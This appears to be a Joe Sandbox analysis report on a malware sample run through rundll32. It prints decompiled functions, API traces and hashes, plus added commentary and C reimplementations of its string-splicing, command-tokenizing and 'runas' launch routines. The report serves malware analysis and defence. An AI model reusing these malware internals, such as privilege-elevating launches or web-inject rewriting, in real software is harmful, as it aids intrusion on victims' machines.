                          				if(_t45 == 0) {
                          					StrToIntExW(_v16, 0,  &_v12);
                          					_t45 = 8;
                          					if(_v12 < _t45) {
                          						_t45 = 1;
                          						__eflags = 1;
                          					} else {
                          						_t32 =  *0x100a348; // 0x428d5a8
                          						_t11 = _t32 + 0x100be4c; // 0x52993f4
                          						_t48 = _t11;
                          						_t12 = _t32 + 0x100be00; // 0x4f0053
                          						_t52 = E010028C4(_t11, _t12, _t11);
                          						_t59 = _t52;
                          						if(_t52 != 0) {
                          							_t35 =  *0x100a348; // 0x428d5a8
                          							_t13 = _t35 + 0x100ba51; // 0x30314549
                          							_t37 = E010041FA(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                          							if(_t37 == 0) {
                          								_t61 =  *0x100a2fc - 6;
                          								if( *0x100a2fc <= 6) {
                          									_t42 =  *0x100a348; // 0x428d5a8
                          									_t15 = _t42 + 0x100bde2; // 0x52384549
                          									E010041FA(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                          								}
                          							}
                          							_t38 =  *0x100a348; // 0x428d5a8
                          							_t17 = _t38 + 0x100be90; // 0x5299438
                          							_t18 = _t38 + 0x100be68; // 0x680043
                          							_t45 = E010074B6(_v8, 0x80000001, _t52, _t18, _t17);
                          							HeapFree( *0x100a2d8, 0, _t52);
                          						}
                          					}
                          					HeapFree( *0x100a2d8, 0, _v16);
                          				}
                          				_t54 = _v8;
                          				if(_v8 != 0) {
                          					E01003AC2(_t54);
                          				}
                          				return _t45;
                          			}

                          APIs
                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05299400,00000000,?,76CDF710,00000000,76CDF730), ref: 010021BB
                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05299438,?,00000000,30314549,00000014,004F0053,052993F4), ref: 01002258
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,010066BE), ref: 0100226A
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: f0edf14ebf17a88166e17c6eb291bd5c62dde3cfeb8e8d39066a0c418274f8a6
                          • Instruction ID: f3d293f6562c4be7997140df2da698efad00ac97c09fcc79ebcd2efc1463fcd6
                          • Opcode Fuzzy Hash: f0edf14ebf17a88166e17c6eb291bd5c62dde3cfeb8e8d39066a0c418274f8a6
                          • Instruction Fuzzy Hash: 72317235A00219FFEB23DBD4DC48EDE7BBDEB48700F154065B68497191D7B2AA48DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E010043EB(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                          				void* _v8;
                          				char _v48;
                          				void* __edi;
                          				intOrPtr _t22;
                          				intOrPtr _t30;
                          				intOrPtr _t34;
                          				intOrPtr* _t42;
                          				void* _t43;
                          				void* _t46;
                          				intOrPtr* _t48;
                          				void* _t49;
                          				intOrPtr _t51;
                          
                          				_t42 = _a16;
                          				_t48 = __eax;
                          				_t22 =  *0x100a348; // 0x428d5a8
                          				_t2 = _t22 + 0x100b67a; // 0x657a6973
                          				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
                          				if( *0x100a2ec >= 5) {
                          					_t30 = E010056C8(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
                          					L5:
                          					_a4 = _t30;
                          					L6:
                          					if(_a4 != 0) {
                          						L9:
                          						 *0x100a2ec =  *0x100a2ec + 1;
                          						L10:
                          						return _a4;
                          					}
                          					_t50 = _a16;
                          					 *_t48 = _a16;
                          					_t49 = _v8;
                          					 *_t42 = E0100708D(_t50, _t49); // executed
                          					_t34 = E01002B23(_t49, _t50); // executed
                          					if(_t34 != 0) {
                          						 *_a8 = _t49;
                          						 *_a12 = _t34;
                          						if( *0x100a2ec < 5) {
                          							 *0x100a2ec =  *0x100a2ec & 0x00000000;
                          						}
                          						goto L10;
                          					}
                          					_a4 = 0xbf;
                          					E0100561E();
                          					HeapFree( *0x100a2d8, 0, _t49);
                          					goto L9;
                          				}
                          				_t51 =  *0x100a3e0; // 0x5299b78
                          				if(RtlAllocateHeap( *0x100a2d8, 0, 0x800) == 0) {
                          					_a4 = 8;
                          					goto L6;
                          				}
                          				_t30 = E0100300E(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
                          				goto L5;
                          			}

                          Instruction address column for this listing (0x010043f2 to 0x010044d5, 0x00000000 entries omitted); the per-line pairing with the C code above was lost in extraction.

                          APIs
                          • wsprintfA.USER32 ref: 0100440D
                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01004432
                            • Part of subcall function 0100300E: GetTickCount.KERNEL32 ref: 01003025
                            • Part of subcall function 0100300E: wsprintfA.USER32 ref: 01003072
                            • Part of subcall function 0100300E: wsprintfA.USER32 ref: 0100308F
                            • Part of subcall function 0100300E: wsprintfA.USER32 ref: 010030B1
                            • Part of subcall function 0100300E: wsprintfA.USER32 ref: 010030D8
                            • Part of subcall function 0100300E: wsprintfA.USER32 ref: 01003103
                            • Part of subcall function 0100300E: HeapFree.KERNEL32(00000000,?), ref: 01003116
                            • Part of subcall function 0100300E: wsprintfA.USER32 ref: 01003135
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 010044AC
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: wsprintf$Heap$Free$AllocateCountTick
                          • String ID:
                          • API String ID: 1307794992-0
                          • Opcode ID: 0becb2c10a35dad3cbdacec9381f97704f41c97246eda1fc2d059c6499f42795
                          • Instruction ID: 1adefe607bcd2be93e6431bfacfe41e4f3d2708499ff269e7d33d2f4775799ae
                          • Opcode Fuzzy Hash: 0becb2c10a35dad3cbdacec9381f97704f41c97246eda1fc2d059c6499f42795
                          • Instruction Fuzzy Hash: 3C314C71600219EFDB13DF58D884ADA3BBCFB08344F118062FA85E7291DB79E945CBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B7B7A4: RegCreateKeyA.ADVAPI32(80000001,05FBB7F0,?), ref: 05B7B7B9
                            • Part of subcall function 05B7B7A4: lstrlen.KERNEL32(05FBB7F0,00000000,00000000,00000000,?,05B7A2EB,00000001,?,00000000,00000000,00000000,?,05B6109E,05B89F2C,00000008,00000003), ref: 05B7B7E2
                          • RegQueryValueExA.KERNEL32(00000000,75BCC740,00000000,00000000,05B89068,05B6E6ED,00000001,00000000,05FBC314,05B8906E,00000000,00000000,05B7CB01,05FBC314,75BCC740,00000000), ref: 05B76C72
                          • RegSetValueExA.KERNEL32(05B89068,00000003,00000000,00000003,05B89068,00000028), ref: 05B76CB3
                          • RegCloseKey.ADVAPI32(?), ref: 05B76CBF
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Value$CloseCreateQuerylstrlen
                          • String ID:
                          • API String ID: 2552977122-0
                          • Opcode ID: 3512281cccc9e716ff3077ca6661034cf7fc881775fbc3bd76ff6a78a02a3aea
                          • Instruction ID: 30e8d9f754e6de5bd8e0276dc4720e359fce648d935e4ed6e5994aedec4d0bc6
                          • Opcode Fuzzy Hash: 3512281cccc9e716ff3077ca6661034cf7fc881775fbc3bd76ff6a78a02a3aea
                          • Instruction Fuzzy Hash: 10312A75D10218EFDF229FA8E8469BEBFBAFB04750F1050AAF915A3240D7307A44DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B8087A: lstrlen.KERNEL32(?,00000000,05B7BA3E,00000027,05B8A1E8,?,00000000,?,?,05B7BA3E,?,00000001,?,05B70971,00000000,?), ref: 05B808B0
                            • Part of subcall function 05B8087A: lstrcpy.KERNEL32(00000000,00000000), ref: 05B808D4
                            • Part of subcall function 05B8087A: lstrcat.KERNEL32(00000000,00000000), ref: 05B808DC
                          • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 05B662A8
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 05B662BE
                          • RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 05B66307
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Open$Closelstrcatlstrcpylstrlen
                          • String ID:
                          • API String ID: 4131162436-0
                          • Opcode ID: 58cb907046010f396ac0e6e25990defbb6a2213737e40f75aa561d8cc9c1daf9
                          • Instruction ID: 48d0cf1996e1b0490346e73e10e72a783a52d2de6d377917bcbfbc4e4b6e152d
                          • Opcode Fuzzy Hash: 58cb907046010f396ac0e6e25990defbb6a2213737e40f75aa561d8cc9c1daf9
                          • Instruction Fuzzy Hash: 19213872A10109BFCB01EFA5DD85CAEBBBDFB05254B1040A6F611A3111E774BA59DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E01003B58(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
                          				char _v5;
                          				signed int _v12;
                          				intOrPtr _v16;
                          				char _t28;
                          				void* _t33;
                          				void* _t38;
                          				void* _t45;
                          				char* _t46;
                          				void* _t48;
                          				char* _t56;
                          				char* _t57;
                          				intOrPtr _t59;
                          				void* _t60;
                          
                          				_t56 = _a4;
                          				_t60 = __eax;
                          				_v12 = 0xb; // default status: nothing replaced
                          				if(_t56 != 0 && __eax != 0) {
                          					_t5 = _t60 - 1; // -1
                          					_t46 =  &(_t56[_t5]); // last byte of the length-delimited buffer
                          					_t28 =  *_t46;
                          					_v5 = _t28; // save it ...
                          					 *_t46 = 0; // ... and NUL it so StrStrA cannot run past the buffer (the last byte is excluded from any match)
                          					__imp__(_a8, _t45); // lstrlen(_a8): length of the needle (ref 01003B8C below)
                          					_v16 = _t28; // needle length
                          					_t57 = StrStrA(_t56, _a8); // first occurrence of the needle in the buffer
                          					if(_t57 != 0) {
                          						 *_t46 = _v5; // restore the saved last byte
                          						_t33 = RtlAllocateHeap( *0x100a2d8, 0, _a16 + _t60); // executed; buffer length + replacement length
                          						_t48 = _t33;
                          						if(_t48 == 0) {
                          							_v12 = 8;
                          						} else {
                          							_t58 = _t57 - _a4; // offset of the match
                          							E01007A1E(_t57 - _a4, _a4, _t48); // copy bytes before the match
                          							_t38 = E01007A1E(_a16, _a12, _t58 + _t48); // copy the replacement (_a12, _a16 bytes)
                          							_t53 = _v16;
                          							_t59 = _a16;
                          							E01007A1E(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59); // copy bytes after the match
                          							 *_a20 = _t48; // output buffer (not NUL-terminated)
                          							_v12 = _v12 & 0x00000000;
                          							 *_a24 = _t60 - _v16 + _t59; // output length = len - needle length + replacement length
                          						}
                          					}
                          				}
                          				return _v12;
                          			}

                          Instruction address column for this listing (0x01003b60 to 0x01003c1f); the per-line pairing with the C code above was lost in extraction.

                          APIs
                          • lstrlen.KERNEL32(76CDF710,?,00000000,?,76CDF710), ref: 01003B8C
                          • StrStrA.SHLWAPI(00000000,?), ref: 01003B99
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 01003BB8
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: AllocateHeaplstrlen
                          • String ID:
                          • API String ID: 556738718-0
                          • Opcode ID: eef2f88f3c613bcc6a3d3b89831eb1cf230c95bb43d6a543b3a1c01286d4e074
                          • Instruction ID: 5427385025f2f511b1f54e02a0612a6c5b58b2abe9a29418814f5904bf8bb771
                          • Opcode Fuzzy Hash: eef2f88f3c613bcc6a3d3b89831eb1cf230c95bb43d6a543b3a1c01286d4e074
                          • Instruction Fuzzy Hash: 56218135600249AFDB12CF6DC884BDEBFB5EF85214F088150ED84AB345C735E955CB90
                          Uniqueness

                          Uniqueness Score: -1.00%
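The routine E01003B58 above is a length-delimited "replace first occurrence" helper: it NUL-terminates the buffer one byte early, locates the needle with StrStrA, allocates len + replacement length, and assembles prefix + replacement + suffix without NUL-terminating the result. The following is an added, portable C reimplementation written for this page (it is not the sample's code and not Joe Sandbox output) so the behaviour can be exercised on constructed input. It deliberately reproduces two quirks an analyst should know about when reading decrypted configs or web-inject handling built on it: the last byte of the buffer can never be part of a match, and an embedded NUL before the needle hides it. Status values 0, 8 and 0xb mirror the decompiled routine; the sample request string is constructed here.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Status values mirroring the decompiled routine: it starts at 0xb and only
 * clears it after a successful copy; 8 is returned when allocation fails. */
enum { SPLICE_OK = 0, SPLICE_NOMEM = 8, SPLICE_NOMATCH = 0xb };

/*
 * Replace the first occurrence of the NUL-terminated `needle` inside the
 * length-delimited buffer hay[0..hlen) with repl[0..rlen).
 *
 * Quirks of the original reproduced on purpose:
 *   1. The sample writes a NUL over hay[hlen-1] before calling StrStrA, so a
 *      match can never include the buffer's last byte.
 *   2. StrStrA stops at the first NUL it meets, so an embedded NUL before the
 *      needle hides it.
 * The output buffer is NOT NUL-terminated; *out_len carries its length.
 * An empty needle is rejected here; the page does not show how StrStrA is
 * expected to behave for that case in the original.
 */
int splice_replace(const char *hay, size_t hlen,
                   const char *needle, const char *repl, size_t rlen,
                   char **out, size_t *out_len)
{
    if (hay == NULL || hlen == 0)
        return SPLICE_NOMATCH;

    size_t nlen = strlen(needle);                 /* lstrlen(_a8)                */
    size_t search = hlen - 1;                     /* quirk 1: last byte excluded */
    const char *nul = memchr(hay, '\0', search);
    if (nul != NULL)
        search = (size_t)(nul - hay);             /* quirk 2: stop at embedded NUL */

    const char *p = NULL;
    if (nlen != 0 && nlen <= search) {
        for (size_t i = 0; i + nlen <= search; i++) {
            if (memcmp(hay + i, needle, nlen) == 0) { p = hay + i; break; }
        }
    }
    if (p == NULL)
        return SPLICE_NOMATCH;

    /* The sample allocates hlen + rlen (over-allocating by nlen); same here. */
    char *buf = malloc(hlen + rlen);
    if (buf == NULL)
        return SPLICE_NOMEM;

    size_t prefix = (size_t)(p - hay);
    memcpy(buf, hay, prefix);                                /* bytes before the match */
    memcpy(buf + prefix, repl, rlen);                        /* replacement            */
    memcpy(buf + prefix + rlen, hay + prefix + nlen,
           hlen - prefix - nlen);                            /* bytes after the match  */

    *out = buf;
    *out_len = hlen - nlen + rlen;
    return SPLICE_OK;
}

/* Constructed sample input (not taken from the analysed sample): rewrite the
 * request path in a request fragment. Returns the new length, or 0 on failure.
 * sizeof req includes the terminating NUL, which is what a caller handing the
 * original routine a C string plus its terminator would pass as the length. */
size_t demo_rewrite(char **out)
{
    static const char req[] = "GET /index.html HTTP/1.1\r\nHost: example.invalid\r\n\r\n";
    size_t n = 0;
    if (splice_replace(req, sizeof req, "/index.html", "/login", 6, out, &n) != SPLICE_OK)
        return 0;
    return n;
}

int main(void)
{
    char *out = NULL;
    size_t n = demo_rewrite(&out);
    if (n != 0) {
        fwrite(out, 1, n, stdout);   /* output carries the copied NUL byte at the end */
        free(out);
    }
    return n != 0 ? 0 : 1;
}
```

Note that `splice_replace("hello world", 11, "world", ...)` fails while the same call with length 12 succeeds: the original sacrifices the last byte of its search range, so callers in the sample must pass the terminator as part of the length to match a suffix.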

                          C-Code - Quality: 47%
                          			E01006E6D(char* _a4, char** _a8) {
                          				char* _t7;
                          				char* _t11;
                          				char* _t14;
                          				char* _t16;
                          				char* _t17;
                          				char _t18;
                          				signed int _t20;
                          				signed int _t22;
                          
                          				_t16 = _a4;
                          				_push(0x20);
                          				_t20 = 1;
                          				_push(_t16);
                          				while(1) {
                          					_t7 = StrChrA();
                          					if(_t7 == 0) {
                          						break;
                          					}
                          					_t20 = _t20 + 1;
                          					_push(0x20);
                          					_push( &(_t7[1]));
                          				}
                          				_t11 = E01006D63(_t20 << 2); // allocate (number of spaces + 1) pointers, 4 bytes each
                          				_a4 = _t11;
                          				if(_t11 != 0) {
                          					StrTrimA(_t16, 0x1009284); // executed; the trim character set at 0x1009284 is not shown on this page
                          					_t22 = 0;
                          					do {
                          						_t14 = StrChrA(_t16, 0x20);
                          						if(_t14 != 0) {
                          							 *_t14 = 0;
                          							do {
                          								_t14 =  &(_t14[1]);
                          								_t18 =  *_t14;
                          							} while (_t18 == 0x20 || _t18 == 9);
                          						}
                          						_t17 = _a4;
                          						 *(_t17 + _t22 * 4) = _t16;
                          						_t22 = _t22 + 1;
                          						_t16 = _t14;
                          					} while (_t14 != 0);
                          					 *_a8 = _t17;
                          				}
                          				return 0;
                          			}

                          Instruction address column for this listing (0x01006e71 to 0x01006ee4, 0x00000000 entries omitted); the per-line pairing with the C code above was lost in extraction.

                          APIs
                          • StrChrA.SHLWAPI(?,00000020,00000000,052995AC,?,?,010076A6,?,052995AC), ref: 01006E89
                          • StrTrimA.SHLWAPI(?,01009284,00000002,?,010076A6,?,052995AC), ref: 01006EA7
                          • StrChrA.SHLWAPI(?,00000020,?,010076A6,?,052995AC), ref: 01006EB2
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Trim
                          • String ID:
                          • API String ID: 3043112668-0
                          • Opcode ID: 12cd4a55ff3683ea835b67b11c050e13d222a9a0d42f7f186ba48028f80ee846
                          • Instruction ID: b0a1f37b98a46a8ed62400c6ae104bc37d33a725e82844c61bdd5f0ff74a97f7
                          • Opcode Fuzzy Hash: 12cd4a55ff3683ea835b67b11c050e13d222a9a0d42f7f186ba48028f80ee846
                          • Instruction Fuzzy Hash: 65019E71300396AEF7625A2ACC44F677EDEEB85750F041051AA85CB2C2DA72DC628660
                          Uniqueness

                          Uniqueness Score: -1.00%
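E01006E6D above is the sample's command-line tokenizer: it counts spaces to size a pointer array, trims the line with StrTrimA, then walks it with StrChrA, NUL-ing each space and skipping any following run of spaces and tabs. The block below is an added C reimplementation written for this page (not the sample's code, not Joe Sandbox output) that makes the splitting rules explicit and testable. Two assumptions are labelled in the code: the StrTrimA character set at 0x1009284 is not shown on the page and is taken to be space and tab, and a trailing NULL slot is added to the array for the caller's convenience, which the original only gets if E01006D63 returns zeroed memory. The sample command lines are constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumption: the character set handed to StrTrimA (0x1009284) is not shown
 * on this page; space and tab are used here. StrTrimA strips those characters
 * from both ends in place, which is what this helper does. */
static void trim_in_place(char *s)
{
    size_t n = strlen(s);
    while (n > 0 && (s[n - 1] == ' ' || s[n - 1] == '\t'))
        s[--n] = '\0';
    size_t lead = 0;
    while (s[lead] == ' ' || s[lead] == '\t')
        lead++;
    if (lead > 0)
        memmove(s, s + lead, n - lead + 1);
}

/*
 * Split `line` in place into an argv-style array the way the decompiled
 * routine does: the separator is a single space; after a separator, any run
 * of spaces and tabs is skipped. A tab that does not follow a space is NOT a
 * separator, so "a\tb" stays one token. The array is sized from the number of
 * spaces plus one, as in the original; one extra NULL slot is added here
 * (assumption, see lead-in) so callers can walk it without the count.
 * Returns the token count, 0 on allocation failure.
 */
size_t split_command(char *line, char ***out_argv)
{
    size_t cap = 1;                                   /* spaces + 1 */
    for (const char *p = line; (p = strchr(p, ' ')) != NULL; p++)
        cap++;

    char **argv = calloc(cap + 1, sizeof *argv);
    if (argv == NULL)
        return 0;

    trim_in_place(line);                              /* StrTrimA */

    size_t argc = 0;
    char *tok = line;
    for (;;) {
        char *sep = strchr(tok, ' ');                 /* StrChrA(tok, 0x20) */
        if (sep != NULL) {
            *sep++ = '\0';                            /* terminate the token */
            while (*sep == ' ' || *sep == '\t')       /* skip the run that follows */
                sep++;
        }
        argv[argc++] = tok;
        if (sep == NULL)
            break;
        tok = sep;
    }
    *out_argv = argv;
    return argc;
}

int main(void)
{
    char line[] = "  cmd  arg1\targ2 arg3 ";            /* constructed sample */
    char **argv = NULL;
    size_t argc = split_command(line, &argv);
    for (size_t i = 0; i < argc; i++)
        printf("argv[%zu] = \"%s\"\n", i, argv[i]);
    free(argv);
    return 0;
}
```

The practical consequence of the tab rule is that a backdoor operator separating arguments only with tabs would hand the sample a single token; the skipping of tabs exists only to absorb mixed whitespace after a real space.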

                          C-Code - Quality: 64%
                          			E01007928(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                          				intOrPtr _v36;
                          				intOrPtr _v44;
                          				intOrPtr _v48;
                          				intOrPtr _v52;
                          				void _v60;
                          				char _v64;
                          				long _t14;
                          				intOrPtr _t18;
                          				intOrPtr _t19;
                          				intOrPtr _t26;
                          				intOrPtr _t27;
                          				long _t28;
                          
                          				_t27 = __edi;
                          				_t26 = _a8;
                          				_t14 = E01003F07(_a4, _t26, __edi); // executed; first launch attempt (builds BSTRs with SysAllocString, see APIs below); nonzero here means it failed and the fallback runs
                          				_t28 = _t14;
                          				if(_t28 != 0) {
                          					memset( &_v60, 0, 0x38);
                          					_t18 =  *0x100a348; // 0x428d5a8
                          					_t28 = 0;
                          					_v64 = 0x3c; // cbSize = 60 = sizeof(SHELLEXECUTEINFOW) on 32-bit; the field offsets below (lpVerb +12, lpFile +16, lpParameters +20, nShow +28) match that structure
                          					if(_a12 == 0) {
                          						_t7 = _t18 + 0x100b4e0; // 0x70006f = L"op..." (wide string starting "op", consistent with the verb "open")
                          						_t19 = _t7;
                          					} else {
                          						_t6 = _t18 + 0x100b8f4; // 0x750072 = L"ru..." (wide string starting "ru", consistent with the verb "runas")
                          						_t19 = _t6;
                          					}
                          					_v52 = _t19; // lpVerb
                          					_push(_t28);
                          					_v48 = _a4; // lpFile
                          					_v44 = _t26; // lpParameters
                          					_v36 = _t27; // nShow
                          					E010023AA();
                          					_push( &_v64);
                          					if( *0x100a100() == 0) { // indirect call through a resolved pointer; the argument and structure layout are consistent with ShellExecuteExW
                          						_t28 = GetLastError();
                          					}
                          					_push(1);
                          					E010023AA();
                          				}
                          				return _t28;
                          			}

                          Instruction address column for this listing (0x01007928 to 0x010079ab); the per-line pairing with the C code above was lost in extraction.

                          APIs
                            • Part of subcall function 01003F07: SysAllocString.OLEAUT32(00000000), ref: 01003F61
                            • Part of subcall function 01003F07: SysAllocString.OLEAUT32(0070006F), ref: 01003F75
                            • Part of subcall function 01003F07: SysAllocString.OLEAUT32(00000000), ref: 01003F87
                          • memset.NTDLL ref: 0100794B
                          • GetLastError.KERNEL32 ref: 01007997
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: AllocString$ErrorLastmemset
                          • String ID: <
                          • API String ID: 3736384471-4251816714
                          • Opcode ID: dcdf4eb508fee73cca44e4e551b1382d375f19d83527ea827b70f7509ecd434c
                          • Instruction ID: 6dcd6eb236767ec0e2417d7efcc6ca56802ceee6d77d98e0370559ec8dd16760
                          • Opcode Fuzzy Hash: dcdf4eb508fee73cca44e4e551b1382d375f19d83527ea827b70f7509ecd434c
                          • Instruction Fuzzy Hash: 94014071900219AFEB22EFA8D888EDEBBF8BB08744F454165F994E7281D774A504CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegCreateKeyA.ADVAPI32(80000001,05FBB7F0,?), ref: 05B7B7B9
                          • RegOpenKeyA.ADVAPI32(80000001,05FBB7F0,?), ref: 05B7B7C3
                          • lstrlen.KERNEL32(05FBB7F0,00000000,00000000,00000000,?,05B7A2EB,00000001,?,00000000,00000000,00000000,?,05B6109E,05B89F2C,00000008,00000003), ref: 05B7B7E2
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateOpenlstrlen
                          • String ID:
                          • API String ID: 2865187142-0
                          • Opcode ID: 8ebc5a8d3ec6ccbe6596bc0dae0f29fc531610911fa35ac5836a65ce89c94fc8
                          • Instruction ID: ce1aa094af54250dc19a01dc551aaf67507b99d232709ed41d144e4b50ffdbe8
                          • Opcode Fuzzy Hash: 8ebc5a8d3ec6ccbe6596bc0dae0f29fc531610911fa35ac5836a65ce89c94fc8
                          • Instruction Fuzzy Hash: 86F0967610020CBFDB119F51DC89FBB7F6DFB45794F148089FD068A180EA70A680CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetEvent.KERNEL32(000005BC,05B7C3DB), ref: 05B7E83B
                            • Part of subcall function 05B634FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,05B7E846), ref: 05B63528
                            • Part of subcall function 05B634FF: RtlDeleteCriticalSection.NTDLL(05B8A3E0), ref: 05B6355B
                            • Part of subcall function 05B634FF: RtlDeleteCriticalSection.NTDLL(05B8A400), ref: 05B63562
                            • Part of subcall function 05B634FF: ReleaseMutex.KERNEL32(000005C8,00000000,?,?,?,05B7E846), ref: 05B6358B
                            • Part of subcall function 05B634FF: FindCloseChangeNotification.KERNEL32(?,?,05B7E846), ref: 05B63597
                            • Part of subcall function 05B634FF: ResetEvent.KERNEL32(00000000,00000000,?,?,?,05B7E846), ref: 05B635A3
                            • Part of subcall function 05B634FF: CloseHandle.KERNEL32(?,?,05B7E846), ref: 05B635AF
                            • Part of subcall function 05B634FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,05B7E846), ref: 05B635B5
                            • Part of subcall function 05B634FF: SleepEx.KERNEL32(00000064,00000001,?,?,05B7E846), ref: 05B635C9
                            • Part of subcall function 05B634FF: HeapFree.KERNEL32(00000000,00000000,?,?,05B7E846), ref: 05B635ED
                            • Part of subcall function 05B634FF: RtlRemoveVectoredExceptionHandler.NTDLL(059805B8), ref: 05B63623
                            • Part of subcall function 05B634FF: SleepEx.KERNEL32(00000064,00000001,?,?,05B7E846), ref: 05B6363F
                          • CloseHandle.KERNEL32(000005BC), ref: 05B7E850
                          • HeapDestroy.KERNELBASE(05BC0000), ref: 05B7E860
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep$Close$CriticalDeleteEventHandleHeapSection$ChangeDestroyExceptionFindFreeHandlerMutexNotificationReleaseRemoveResetVectored
                          • String ID:
                          • API String ID: 3503058985-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
